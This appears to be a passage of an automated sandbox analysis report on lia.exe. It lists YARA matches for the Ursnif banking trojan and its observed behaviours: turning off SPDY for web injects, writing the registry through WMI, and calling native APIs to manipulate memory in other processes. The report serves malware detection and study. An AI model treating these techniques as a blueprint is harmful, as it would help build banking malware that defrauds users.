Source: Yara match File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR
Source: Yara match File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B17479 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 1_2_00B17479

System Summary:

Writes or reads registry keys via WMI
Source: C:\Users\user\Desktop\lia.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\lia.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\lia.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\lia.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\lia.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\Desktop\lia.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\lia.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Users\user\Desktop\lia.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\lia.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\lia.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\lia.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\lia.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B16DD3 1_2_00B16DD3
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B17F60 1_2_00B17F60
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B16B67 1_2_00B16B67
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039E63BC 1_2_039E63BC
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039EA241 1_2_039EA241
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D95FE 1_2_039D95FE
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039EF1EE 1_2_039EF1EE
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D9D64 1_2_039D9D64
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039DC086 1_2_039DC086
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D34DC 1_2_039D34DC
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039E78F1 1_2_039E78F1
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D504A 1_2_039D504A
Source: C:\Windows\System32\control.exe Code function: 18_2_0054AB44 18_2_0054AB44
Source: C:\Windows\System32\control.exe Code function: 18_2_0054B58C 18_2_0054B58C
Source: C:\Windows\System32\control.exe Code function: 18_2_005386D0 18_2_005386D0
Source: C:\Windows\System32\control.exe Code function: 18_2_00549858 18_2_00549858
Source: C:\Windows\System32\control.exe Code function: 18_2_00532804 18_2_00532804
Source: C:\Windows\System32\control.exe Code function: 18_2_0053A808 18_2_0053A808
Source: C:\Windows\System32\control.exe Code function: 18_2_0053B008 18_2_0053B008
Source: C:\Windows\System32\control.exe Code function: 18_2_00548820 18_2_00548820
Source: C:\Windows\System32\control.exe Code function: 18_2_00538024 18_2_00538024
Source: C:\Windows\System32\control.exe Code function: 18_2_00535828 18_2_00535828
Source: C:\Windows\System32\control.exe Code function: 18_2_005268FC 18_2_005268FC
Source: C:\Windows\System32\control.exe Code function: 18_2_005340E8 18_2_005340E8
Source: C:\Windows\System32\control.exe Code function: 18_2_00523890 18_2_00523890
Source: C:\Windows\System32\control.exe Code function: 18_2_00524080 18_2_00524080
Source: C:\Windows\System32\control.exe Code function: 18_2_00545954 18_2_00545954
Source: C:\Windows\System32\control.exe Code function: 18_2_0052B154 18_2_0052B154
Source: C:\Windows\System32\control.exe Code function: 18_2_0053194B 18_2_0053194B
Source: C:\Windows\System32\control.exe Code function: 18_2_005231D4 18_2_005231D4
Source: C:\Windows\System32\control.exe Code function: 18_2_00536190 18_2_00536190
Source: C:\Windows\System32\control.exe Code function: 18_2_005352CC 18_2_005352CC
Source: C:\Windows\System32\control.exe Code function: 18_2_005212BC 18_2_005212BC
Source: C:\Windows\System32\control.exe Code function: 18_2_00542330 18_2_00542330
Source: C:\Windows\System32\control.exe Code function: 18_2_00537BFC 18_2_00537BFC
Source: C:\Windows\System32\control.exe Code function: 18_2_00542BA0 18_2_00542BA0
Source: C:\Windows\System32\control.exe Code function: 18_2_00523BA4 18_2_00523BA4
Source: C:\Windows\System32\control.exe Code function: 18_2_0053BC10 18_2_0053BC10
Source: C:\Windows\System32\control.exe Code function: 18_2_0052C49C 18_2_0052C49C
Source: C:\Windows\System32\control.exe Code function: 18_2_005344B4 18_2_005344B4
Source: C:\Windows\System32\control.exe Code function: 18_2_0052DCA8 18_2_0052DCA8
Source: C:\Windows\System32\control.exe Code function: 18_2_0053CCA8 18_2_0053CCA8
Source: C:\Windows\System32\control.exe Code function: 18_2_00530544 18_2_00530544
Source: C:\Windows\System32\control.exe Code function: 18_2_00547D6C 18_2_00547D6C
Source: C:\Windows\System32\control.exe Code function: 18_2_0053751C 18_2_0053751C
Source: C:\Windows\System32\control.exe Code function: 18_2_00544530 18_2_00544530
Source: C:\Windows\System32\control.exe Code function: 18_2_00529DF0 18_2_00529DF0
Source: C:\Windows\System32\control.exe Code function: 18_2_0054C588 18_2_0054C588
Source: C:\Windows\System32\control.exe Code function: 18_2_00548DA0 18_2_00548DA0
Source: C:\Windows\System32\control.exe Code function: 18_2_00531618 18_2_00531618
Source: C:\Windows\System32\control.exe Code function: 18_2_00543E2C 18_2_00543E2C
Source: C:\Windows\System32\control.exe Code function: 18_2_0052A6D0 18_2_0052A6D0
Source: C:\Windows\System32\control.exe Code function: 18_2_00547EA0 18_2_00547EA0
Source: C:\Windows\System32\control.exe Code function: 18_2_00539740 18_2_00539740
Source: C:\Windows\System32\control.exe Code function: 18_2_0052CF44 18_2_0052CF44
Source: C:\Windows\System32\control.exe Code function: 18_2_0053FF4C 18_2_0053FF4C
Source: C:\Windows\System32\control.exe Code function: 18_2_00527F64 18_2_00527F64
Source: C:\Windows\System32\control.exe Code function: 18_2_005437D0 18_2_005437D0
Source: C:\Windows\System32\control.exe Code function: 18_2_00548FA8 18_2_00548FA8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47F86D0 34_2_00000215F47F86D0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F480AB44 34_2_00000215F480AB44
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F4808820 34_2_00000215F4808820
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47E3BA4 34_2_00000215F47E3BA4
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F4809858 34_2_00000215F4809858
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F4802BA0 34_2_00000215F4802BA0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F4808FA8 34_2_00000215F4808FA8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47F5828 34_2_00000215F47F5828
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47F8024 34_2_00000215F47F8024
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F48037D0 34_2_00000215F48037D0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47FBC10 34_2_00000215F47FBC10
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47FB008 34_2_00000215F47FB008
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47FA808 34_2_00000215F47FA808
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47F2804 34_2_00000215F47F2804
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47F7BFC 34_2_00000215F47F7BFC
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47F40E8 34_2_00000215F47F40E8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F4804530 34_2_00000215F4804530
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47F44B4 34_2_00000215F47F44B4
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47EDCA8 34_2_00000215F47EDCA8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47EC49C 34_2_00000215F47EC49C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F4805954 34_2_00000215F4805954
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47E3890 34_2_00000215F47E3890
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47E4080 34_2_00000215F47E4080
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F4807D6C 34_2_00000215F4807D6C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47EB154 34_2_00000215F47EB154
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47F194B 34_2_00000215F47F194B
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47F0544 34_2_00000215F47F0544
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47FCCA8 34_2_00000215F47FCCA8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47F751C 34_2_00000215F47F751C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47E68FC 34_2_00000215F47E68FC
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47E9DF0 34_2_00000215F47E9DF0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47E31D4 34_2_00000215F47E31D4
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F4803E2C 34_2_00000215F4803E2C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47F6190 34_2_00000215F47F6190
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F480C588 34_2_00000215F480C588
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F480B58C 34_2_00000215F480B58C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F4808DA0 34_2_00000215F4808DA0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47F1618 34_2_00000215F47F1618
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47EA6D0 34_2_00000215F47EA6D0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47F52CC 34_2_00000215F47F52CC
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47E12BC 34_2_00000215F47E12BC
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F4802330 34_2_00000215F4802330
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47FFF4C 34_2_00000215F47FFF4C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47E7F64 34_2_00000215F47E7F64
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F4807EA0 34_2_00000215F4807EA0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47ECF44 34_2_00000215F47ECF44
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47F9740 34_2_00000215F47F9740
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036C63BC 44_2_036C63BC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036CA241 44_2_036CA241
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036CF1EE 44_2_036CF1EE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036B504A 44_2_036B504A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036C78F1 44_2_036C78F1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036BC086 44_2_036BC086
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036CCF97 44_2_036CCF97
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036B9D64 44_2_036B9D64
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036B95FE 44_2_036B95FE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036D5430 44_2_036D5430
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036B34DC 44_2_036B34DC
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039DE6B9 CreateProcessAsUserA, 1_2_039DE6B9
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses 32bit PE files
Source: lia.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains functionality to call native functions
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_0040140F NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 1_2_0040140F
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_0040182F GetProcAddress,NtCreateSection,memset, 1_2_0040182F
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00401ABC NtMapViewOfSection, 1_2_00401ABC
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B160A0 NtMapViewOfSection, 1_2_00B160A0
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B15D85 GetProcAddress,NtCreateSection,memset, 1_2_00B15D85
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B1231E NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_00B1231E
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B18185 NtQueryVirtualMemory, 1_2_00B18185
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039EB38D memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 1_2_039EB38D
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039DD317 NtMapViewOfSection, 1_2_039DD317
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039ECEED GetProcAddress,NtCreateSection,memset, 1_2_039ECEED
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039F1AE3 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_039F1AE3
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D76E3 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 1_2_039D76E3
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039DD274 NtQueryInformationProcess, 1_2_039DD274
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039F29E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_039F29E0
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039E2931 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_039E2931
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039E7523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_039E7523
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D317C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_039D317C
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D696A GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 1_2_039D696A
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D8C10 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 1_2_039D8C10
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D3F97 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_039D3F97
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039E0B30 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_039E0B30
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039E7EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 1_2_039E7EEF
